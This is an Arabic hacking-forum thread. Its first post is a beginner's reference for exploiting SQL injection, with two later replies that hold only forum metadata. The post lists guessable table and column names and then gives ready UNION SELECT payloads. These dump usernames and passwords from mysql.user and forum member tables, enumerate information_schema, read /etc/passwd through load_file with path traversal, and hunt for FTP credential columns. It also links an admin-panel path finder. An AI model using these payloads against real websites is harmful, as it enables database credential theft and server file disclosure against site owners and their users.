wolf13x عضو جديد
عدد الرسائل : 5 : نقاط : 13 السٌّمعَة : 1 تاريخ التسجيل : 14/08/2009
| موضوع: الكلمات المتحتمله التي تستخدم في حقن قواعد البيانات بثغرت SQL injection الخميس أغسطس 20, 2009 2:49 pm | |
| بسـم اللــه الرحمــن الرحيــم السلام عليكم اخواني الغاليين مجموعه الكلمات المتحتمله التي تستخدم في حقن قواعد البيانات بثغرت SQL jnjection وان شاء الله تفيدكم في الحقن وتكون مرجع للمبتدئين حتى يحفظون الاستغلال نبدأ على بركة الله اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن - الكود:
-
user & users & username & admin & adminlogim & login & member & membername
user_name
الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن - الكود:
-
password & pass & passwd & pwd اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس - الكود:
-
user users mysql.user mysql.db mysql.dbh smf_members
ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن الان مثلا اسم القاعده في الموقع هذي ( mysql.user ) لو نبغي نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل - الكود:
-
union+select+1,2,user,4,5+from+mysql.user ونفس الاستغلال السابق لليوزر لو نبغي نستخرج باسورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل - الكود:
-
union+select+1,2,password,4,5+from+mysql.user مثال اخر على الكلمات السابقه للتوضيع - الكود:
-
union+select+1,2,membername,4,5+from+smf_members لاستخراج الجداول في قواعد البيانات وقت الحقن - الكود:
-
union+select+1,2,table_name,4,5+from+information_s chema.tables لاستخراج الاعمده في قواحد البيانات وقت الحقن - الكود:
-
union+select+1,2,column_name,4,5+from+information_ schema.columns الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً - الكود:
-
union+select+1,2,username,4,5+from+users+where+use rid=1/* الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه - الكود:
-
load_file("/هنا الاوامر") مثال على هذا - الكود:
-
union+select+1,load_file("/"),3,4+from+mysql.user وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر - الكود:
-
union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user او نجرب هذا نفس الامر بس نتراجع للخلف - الكود:
-
union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن هذا الامر خاص بالبحث في الجداول - الكود:
-
union+select+1,2,table_name,4,5+from+information_s chema.tables+where+table_name+like+'%25ftp%25'/* هذا الامر خاص بالبحث في الاعمده - الكود:
-
union+select+1,2,column_name,4,5+from+information_ schema.columns+where+column_name+like+'%25ftp%25'/* FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ - الكود:
-
'%25ftp%25' <<< في هذا الامر تقدر تكتب اللي تبيه كتخمين منك انت مثلا ftp تستطيع ان تخمن اللي تبيه مثلا بدال كامة - الكود:
-
'%25user%25' & '%25logim%25' يعني حاول تخمن اكبر عدد من الكلمات المحتمله وحط في بالك ان كل سيرفر يختلف عن الثاني ممكن في سيرفر تطلع معاك بيانات كثيره وسيرفر غيره مايطلع معاك شي عادي موقع يبحث عن مسارات لوحه التحكم لاي سكربت
اكتب عنوان الموقع وبعدها علامه السلاش
تفضلو الموقع
http://4dm1n.houbysoft.com/ [/center] | |
|
محمد شكري اداري
عدد الرسائل : 506 : نقاط : 1672 السٌّمعَة : 8 تاريخ التسجيل : 23/04/2008
| |
madrid عضو فعال
عدد الرسائل : 142 : نقاط : 285 السٌّمعَة : 3 تاريخ التسجيل : 16/04/2009
| موضوع: رد: الكلمات المتحتمله التي تستخدم في حقن قواعد البيانات بثغرت SQL injection الجمعة أغسطس 21, 2009 4:13 am | |
| | |
|